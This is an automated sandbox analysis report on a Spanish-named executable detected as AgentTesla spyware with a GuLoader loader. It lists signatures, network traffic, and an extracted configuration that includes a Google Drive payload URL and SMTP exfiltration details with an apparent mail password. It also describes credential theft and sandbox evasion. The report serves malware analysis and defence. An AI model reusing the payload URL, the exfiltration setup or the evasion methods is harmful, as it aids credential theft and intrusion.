Windows Analysis Report justificante de la transfer.exe

Overview

General Information

Sample Name: justificante de la transfer.exe
Analysis ID: 526293
MD5: e565201ac69a8a2fa7ee22e0809f7b3c
SHA1: fed196aeff9aca57c198b0b99a9c9bc6e01d31b9
SHA256: b6fad861abae70b69d7f0ef4e51756b181149e165ada09aee47e3d2bd5f9a0c6
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?exporto"}
Source: conhost.exe.8684.12.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "arealaboral@neopyme.comnJm038qQkPmail.neopyme.combernardkincaid01@gmail.com"}
Multi AV Scanner detection for submitted file
Source: justificante de la transfer.exe Virustotal: Detection: 22% Perma Link
Source: justificante de la transfer.exe ReversingLabs: Detection: 11%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E2C130 CryptUnprotectData, 11_2_00E2C130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E2C7D3 CryptUnprotectData, 11_2_00E2C7D3

Compliance:

barindex
Uses 32bit PE files
Source: justificante de la transfer.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49757 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?exporto
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.36.109.179 54.36.109.179
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-b8-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49775 -> 54.36.109.179:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49775 -> 54.36.109.179:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: http://YacheoH9CTlBmpI1K.com
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: http://YacheoH9CTlBmpI1K.comt
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: http://YacheoH9CTlBmpI1K.comt-
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: CasPol.exe, 0000000B.00000003.1883579517.000000002102C000.00000004.00000010.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000B.00000002.5706986424.000000001FDE0000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.11.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: CasPol.exe, 0000000B.00000002.5706986424.000000001FDE0000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabkS
Source: CasPol.exe, 0000000B.00000003.1879317771.000000001FEBA000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?8028f1dafc
Source: CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp String found in binary or memory: http://mail.neopyme.com
Source: CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp String found in binary or memory: http://neopyme.com
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp String found in binary or memory: http://pYhQFb.com
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp String found in binary or memory: http://r3.i.lencr.org/09
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 0000000B.00000002.5676049058.0000000000F27000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.11.dr String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp String found in binary or memory: http://x1.i.lencr.org/U
Source: CasPol.exe, 0000000B.00000003.1879317771.000000001FEBA000.00000004.00000001.sdmp String found in binary or memory: http://x1.i.lencr.org:80/
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/&/
Source: CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/-
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrin
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/T
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT
Source: CasPol.exe, 0000000B.00000002.5676049058.0000000000F27000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT6
Source: CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT6MSuMCoPhcuIw3UZ4
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5700265223.000000001DD36000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000B.00000002.5700265223.000000001DD36000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-b8-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49757 version: TLS 1.2

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Jump to dropped file

System Summary:

barindex
Uses 32bit PE files
Source: justificante de la transfer.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A004A0 11_2_00A004A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A05960 11_2_00A05960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A0A200 11_2_00A0A200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A04A28 11_2_00A04A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A4C080 11_2_00A4C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A44320 11_2_00A44320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A4BA48 11_2_00A4BA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A43A50 11_2_00A43A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A41120 11_2_00A41120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A43708 11_2_00A43708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AC6D90 11_2_00AC6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00AC07E0 11_2_00AC07E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DFB458 11_2_00DFB458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DFEAC0 11_2_00DFEAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DF8612 11_2_00DF8612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DF5B91 11_2_00DF5B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DF44F8 11_2_00DF44F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00DF3330 11_2_00DF3330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E25072 11_2_00E25072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E235A0 11_2_00E235A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E2EAB8 11_2_00E2EAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E29348 11_2_00E29348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E24738 11_2_00E24738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E21C28 11_2_00E21C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00E29D44 11_2_00E29D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DA35E08 11_2_1DA35E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DA346C4 11_2_1DA346C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DA35DC3 11_2_1DA35DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1DA36AF1 11_2_1DA36AF1
Contains functionality to call native functions
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023064CB NtWriteVirtualMemory, 0_2_023064CB
Sample file is different than original file name gathered from version info
Source: justificante de la transfer.exe, 00000000.00000000.611730099.0000000000445000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCappuccino.exe vs justificante de la transfer.exe
Source: justificante de la transfer.exe Binary or memory string: OriginalFilenameCappuccino.exe vs justificante de la transfer.exe
PE file contains strange resources
Source: justificante de la transfer.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: justificante de la transfer.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\justificante de la transfer.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: justificante de la transfer.exe Virustotal: Detection: 22%
Source: justificante de la transfer.exe ReversingLabs: Detection: 11%
Source: justificante de la transfer.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\justificante de la transfer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\justificante de la transfer.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe" Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe File created: C:\Users\user\AppData\Local\Temp\~DFC7BBBE7FAB9778BB.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@4/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.933649087.0000000002300000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_00406467 push esi; iretd 0_2_00406468
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_00404E11 push eax; ret 0_2_00404E19
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_00403CFC push cs; retf 0_2_00403D26
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_004045D2 push cs; iretd 0_2_004045ED
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_00404B97 push eax; retf 0_2_00404B99
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_00404DB7 push cs; retf 0_2_00404DBB
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02303A4B push ebx; iretd 0_2_02303AB5
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02307AF8 pushfd ; iretd 0_2_02307AF9
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02301BC0 push 53B0A25Ah; iretd 0_2_02301BC5
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230803B push ds; ret 0_2_0230805D
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02300825 push ebx; retf 0_2_0230086D
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023000E8 push eax; iretd 0_2_023000EB
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023009F3 push ebx; iretd 0_2_023009F5
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023009FB push ebx; iretd 0_2_023009F5
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023051E6 push ebx; iretd 0_2_023051F1
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02302E2F push edx; iretd 0_2_02302E31
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02303670 push ebx; retf 0_2_02303671
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023076E1 push 26441584h; iretd 0_2_02307713
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023036DC push ebx; retf 0_2_023036DD
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230472B push es; retf 0_2_0230472D
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230078D push eax; iretd 0_2_02300793
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02304454 pushfd ; retf 0_2_02304455
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230644C push ds; ret 0_2_02306469
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02300D1B push ebx; iretd 0_2_02300D81
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230054C push ebx; iretd 0_2_0230054D
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_0230158E push ecx; iretd 0_2_02301593
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_023015C2 push ds; iretd 0_2_023015C9
Source: C:\Users\user\Desktop\justificante de la transfer.exe Code function: 0_2_02303DC2 push 26441584h; iretd 0_2_02303DCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A047D8 pushfd ; ret 11_2_00A04939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A05908 push eax; retf 11_2_00A05909

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
